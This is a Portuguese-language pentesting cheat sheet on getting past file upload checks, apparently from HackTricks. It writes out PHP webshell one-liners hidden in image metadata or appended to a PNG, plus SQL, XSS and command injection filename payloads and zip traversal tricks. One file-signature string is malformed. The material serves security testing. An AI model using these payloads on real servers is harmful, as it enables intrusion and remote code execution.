File Upload
PreviousLFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path DisclosureNextPDF Upload - XXE and CORS bypass
Last updated
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Se você está interessado em carreira de hacking e hackear o inhackeável - estamos contratando! (fluência em polonês escrita e falada é necessária).
Outras extensões úteis:
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
Funcionando no PHPv8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws
Se aplicável, verifique as extensões anteriores. Também teste-as usando algumas letras maiúsculas: pHp, .pHP5, .PhAr ...
Verifique adicionando uma extensão válida antes da extensão de execução (use também as extensões anteriores):
file.png.php
file.png.Php5
Tente adicionar caracteres especiais no final. Você pode usar o Burp para bruteforce todos os caracteres ascii e Unicode. (Note que você também pode tentar usar as extensões mencionadas anteriormente)
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
Tente contornar as proteções enganando o parser de extensão do lado do servidor com técnicas como dobrar a extensão ou adicionar dados lixo (bytes nulos) entre as extensões. Você também pode usar as extensões anteriores para preparar um payload melhor.
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
Adicione outra camada de extensões à verificação anterior:
file.png.jpg.php
file.php%00.png%00.jpg
Tente colocar a extensão exec antes da extensão válida e reze para que o servidor esteja mal configurado. (útil para explorar configurações incorretas do Apache onde qualquer coisa com extensão _.php_, mas** não necessariamente terminando em .php** executará código):
ex: file.php.png
Usando NTFS alternate data stream (ADS) no Windows. Nesse caso, um caractere de dois pontos “:” será inserido após uma extensão proibida e antes de uma permitida. Como resultado, um arquivo vazio com a extensão proibida será criado no servidor (por exemplo, “file.asax:.jpg”). Este arquivo pode ser editado posteriormente usando outras técnicas, como usar seu nome de arquivo curto. O padrão “::$data” também pode ser usado para criar arquivos não vazios. Portanto, adicionar um caractere de ponto após esse padrão também pode ser útil para contornar mais restrições (por exemplo, “file.asp::$data.”)
Tente quebrar os limites do nome do arquivo. A extensão válida é cortada. E o PHP malicioso é deixado. AAA<--SNIP-->AAA.php
Contorne as verificações de Content-Type definindo o valor do cabeçalho Content-Type para: image/png, text/plain, application/octet-stream_
wordlist de Content-Type: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt
Contorne a verificação de magic number adicionando no início do arquivo os bytes de uma imagem real (confunda o comando file). Ou introduza o shell dentro dos metadados:
exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
\ ou você também pode introduzir o payload diretamente em uma imagem:
echo '<?php system($_REQUEST['cmd']); ?>' >> img.png
Se compressões estão sendo adicionadas à sua imagem, por exemplo, usando algumas bibliotecas PHP padrão como PHP-GD, as técnicas anteriores não serão úteis. No entanto, você pode usar a técnica do chunk PLTE definida aqui para inserir algum texto que sobreviva à compressão.
A página da web também pode estar redimensionando a imagem, usando por exemplo as funções PHP-GD imagecopyresized ou imagecopyresampled. No entanto, você pode usar a técnica do chunk IDAT definida aqui para inserir algum texto que sobreviva à compressão.
Outra técnica para fazer um payload que sobrevive a um redimensionamento de imagem, usando a função PHP-GD thumbnailImage. No entanto, você pode usar a técnica do chunk tEXt definida aqui para inserir algum texto que sobreviva à compressão.
Encontre uma vulnerabilidade para renomear o arquivo já enviado (para mudar a extensão).
Encontre uma vulnerabilidade de Inclusão de Arquivo Local para executar o backdoor.
Possível divulgação de informações:
Faça o upload várias vezes (e ao mesmo tempo) do mesmo arquivo com o mesmo nome
Faça o upload de um arquivo com o nome de um arquivo ou pasta que já existe
Faça o upload de um arquivo com “.”, “..”, ou “…” como seu nome. Por exemplo, no Apache em Windows, se a aplicação salvar os arquivos enviados no diretório “/www/uploads/”, o nome de arquivo “.” criará um arquivo chamado “uploads” no diretório “/www/”.
Faça o upload de um arquivo que pode não ser facilmente excluído, como “…:.jpg” em NTFS. (Windows)
Faça o upload de um arquivo no Windows com caracteres inválidos como |<>*?” em seu nome. (Windows)
Faça o upload de um arquivo no Windows usando nomes reservados (proibidos) como CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, e LPT9.
Tente também fazer o upload de um executável (.exe) ou um .html (menos suspeito) que executará código quando acidentalmente aberto pela vítima.
Se você está tentando fazer upload de arquivos para um servidor PHP, dê uma olhada no truque .htaccess para executar código. Se você está tentando fazer upload de arquivos para um servidor ASP, dê uma olhada no truque .config para executar código.
Os arquivos .phar são como os .jar para java, mas para php, e podem ser usados como um arquivo php (executando-o com php, ou incluindo-o dentro de um script...)
A extensão .inc é às vezes usada para arquivos php que são apenas usados para importar arquivos, então, em algum momento, alguém pode ter permitido que essa extensão fosse executada.
Se você pode fazer upload de um arquivo XML em um servidor Jetty, você pode obter RCE porque novos *.xml e *.war são processados automaticamente. Então, como mencionado na imagem a seguir, faça o upload do arquivo XML para $JETTY_BASE/webapps/ e espere pelo shell!
Para uma exploração detalhada dessa vulnerabilidade, confira a pesquisa original: uWSGI RCE Exploitation.
Vulnerabilidades de Execução Remota de Comando (RCE) podem ser exploradas em servidores uWSGI se alguém tiver a capacidade de modificar o arquivo de configuração .ini. Os arquivos de configuração do uWSGI utilizam uma sintaxe específica para incorporar variáveis "mágicas", marcadores de posição e operadores. Notavelmente, o operador '@', utilizado como @(filename), é projetado para incluir o conteúdo de um arquivo. Entre os vários esquemas suportados no uWSGI, o esquema "exec" é particularmente potente, permitindo a leitura de dados da saída padrão de um processo. Esse recurso pode ser manipulado para fins nefastos, como Execução Remota de Comando ou Escrita/Leitura Arbitrária de Arquivo quando um arquivo de configuração .ini é processado.
Considere o seguinte exemplo de um arquivo uwsgi.ini prejudicial, mostrando vários esquemas:
A execução do payload ocorre durante a análise do arquivo de configuração. Para que a configuração seja ativada e analisada, o processo uWSGI deve ser reiniciado (potencialmente após uma falha ou devido a um ataque de negação de serviço) ou o arquivo deve ser configurado para recarregar automaticamente. O recurso de recarregamento automático, se ativado, recarrega o arquivo em intervalos especificados ao detectar alterações.
É crucial entender a natureza flexível da análise do arquivo de configuração do uWSGI. Especificamente, o payload discutido pode ser inserido em um arquivo binário (como uma imagem ou PDF), ampliando ainda mais o escopo de exploração potencial.
Em algumas ocasiões, você pode descobrir que um servidor está usando wget para baixar arquivos e você pode indicar a URL. Nesses casos, o código pode estar verificando se a extensão dos arquivos baixados está dentro de uma lista de permissões para garantir que apenas arquivos permitidos sejam baixados. No entanto, essa verificação pode ser contornada.
O comprimento máximo de um nome de arquivo em linux é 255, no entanto, wget trunca os nomes dos arquivos para 236 caracteres. Você pode baixar um arquivo chamado "A"*232+".php"+".gif", esse nome de arquivo irá contornar a verificação (já que neste exemplo ".gif" é uma extensão válida) mas wget irá renomear o arquivo para "A"*232+".php".
Note que outra opção que você pode estar pensando para contornar essa verificação é fazer o servidor HTTP redirecionar para um arquivo diferente, assim a URL inicial contornará a verificação e então o wget fará o download do arquivo redirecionado com o novo nome. Isso não funcionará a menos que o wget esteja sendo usado com o parâmetro --trust-server-names porque o wget fará o download da página redirecionada com o nome do arquivo indicado na URL original.
Upload Bypass é uma ferramenta poderosa projetada para ajudar Pentesters e Caçadores de Bugs a testar mecanismos de upload de arquivos. Ela aproveita várias técnicas de bug bounty para simplificar o processo de identificação e exploração de vulnerabilidades, garantindo avaliações completas de aplicações web.
Defina filename como ../../../tmp/lol.png e tente alcançar uma traversal de caminho
Defina filename como sleep(10)-- -.jpg e você pode conseguir uma injeção SQL
Defina filename como <svg onload=alert(document.domain)> para conseguir um XSS
Defina filename como ; sleep 10; para testar alguma injeção de comando (mais truques de injeção de comando aqui)
Upload de arquivo JS + XSS = exploração de Service Workers
Tente diferentes payloads svg de https://github.com/allanlw/svg-cheatsheet****
Se você puder indicar ao servidor web para capturar uma imagem de uma URL, você pode tentar abusar de um SSRF. Se essa imagem for salva em algum site público, você também pode indicar uma URL de https://iplogger.org/invisible/ e roubar informações de cada visitante.
PDFs especialmente elaborados para XSS: A seguinte página apresenta como injetar dados PDF para obter execução de JS. Se você puder fazer upload de PDFs, poderá preparar alguns PDFs que executarão JS arbitrário seguindo as indicações dadas.
Faça upload do conteúdo [eicar](https://secure.eicar.org/eicar.com.txt) para verificar se o servidor possui algum antivírus
Verifique se há algum limite de tamanho ao fazer upload de arquivos
Aqui está uma lista das 10 principais coisas que você pode conseguir ao fazer upload (de aqui):
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: XSS armazenado / SSRF / XXE
GIF: XSS armazenado / SSRF
CSV: injeção CSV
XML: XXE
AVI: LFI / SSRF
HTML / JS : injeção HTML / XSS / redirecionamento aberto
PNG / JPEG: ataque de inundação de pixels (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / XXE CEGADO
PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["
JPG: "\xff\xd8\xff"
Consulte https://en.wikipedia.org/wiki/List_of_file_signatures para outros tipos de arquivo.
Se você puder fazer upload de um ZIP que será descompactado dentro do servidor, você pode fazer 2 coisas:
Faça upload de um link contendo links simbólicos para outros arquivos, então, acessando os arquivos descompactados você acessará os arquivos vinculados:
A criação inesperada de arquivos em diretórios durante a descompressão é um problema significativo. Apesar das suposições iniciais de que essa configuração poderia proteger contra a execução de comandos em nível de SO por meio de uploads de arquivos maliciosos, o suporte à compressão hierárquica e as capacidades de travessia de diretórios do formato de arquivo ZIP podem ser explorados. Isso permite que atacantes contornem restrições e escapem de diretórios de upload seguros manipulando a funcionalidade de descompressão da aplicação alvo.
Um exploit automatizado para criar tais arquivos está disponível em evilarc no GitHub. A utilidade pode ser usada conforme mostrado:
Além disso, o truque de symlink com evilarc é uma opção. Se o objetivo é direcionar um arquivo como /flag.txt, um symlink para esse arquivo deve ser criado em seu sistema. Isso garante que o evilarc não encontre erros durante sua operação.
Abaixo está um exemplo de código Python usado para criar um arquivo zip malicioso:
Abusando da compressão para file spraying
Para mais detalhes verifique o post original em: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/
Criando um Shell PHP: O código PHP é escrito para executar comandos passados pela variável $_REQUEST.
File Spraying e Criação de Arquivo Compactado: Múltiplos arquivos são criados e um arquivo zip é montado contendo esses arquivos.
Modificação com um Editor Hex ou vi: Os nomes dos arquivos dentro do zip são alterados usando vi ou um editor hex, mudando "xxA" para "../" para percorrer diretórios.
Carregue este conteúdo com uma extensão de imagem para explorar a vulnerabilidade (ImageMagick , 7.0.1-1) (form do exploit)
Incorporar um shell PHP no bloco IDAT de um arquivo PNG pode contornar efetivamente certas operações de processamento de imagem. As funções imagecopyresized e imagecopyresampled do PHP-GD são particularmente relevantes neste contexto, pois são comumente usadas para redimensionar e reamostrar imagens, respectivamente. A capacidade do shell PHP incorporado de permanecer inalterado por essas operações é uma vantagem significativa para certos casos de uso.
Uma exploração detalhada dessa técnica, incluindo sua metodologia e potenciais aplicações, é fornecida no seguinte artigo: "Encoding Web Shells in PNG IDAT chunks". Este recurso oferece uma compreensão abrangente do processo e suas implicações.
Mais informações em: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
Arquivos poliglotas servem como uma ferramenta única em cibersegurança, agindo como camaleões que podem existir validamente em múltiplos formatos de arquivo simultaneamente. Um exemplo intrigante é um GIFAR, um híbrido que funciona tanto como um GIF quanto como um arquivo RAR. Esses arquivos não estão limitados a essa combinação; combinações como GIF e JS ou PPT e JS também são viáveis.
A utilidade central dos arquivos poliglotas reside em sua capacidade de contornar medidas de segurança que filtram arquivos com base no tipo. A prática comum em várias aplicações envolve permitir apenas certos tipos de arquivos para upload—como JPEG, GIF ou DOC—para mitigar o risco apresentado por formatos potencialmente prejudiciais (por exemplo, JS, PHP ou arquivos Phar). No entanto, um poliglota, ao se conformar aos critérios estruturais de múltiplos tipos de arquivo, pode contornar furtivamente essas restrições.
Apesar de sua adaptabilidade, os poliglotas enfrentam limitações. Por exemplo, enquanto um poliglota pode simultaneamente incorporar um arquivo PHAR (PHp ARchive) e um JPEG, o sucesso de seu upload pode depender das políticas de extensão de arquivo da plataforma. Se o sistema for rigoroso quanto às extensões permitidas, a mera dualidade estrutural de um poliglota pode não ser suficiente para garantir seu upload.
Mais informações em: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
If you are interested in hacking career and hack the unhackable - we are hiring! (fluent polish written and spoken required).
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
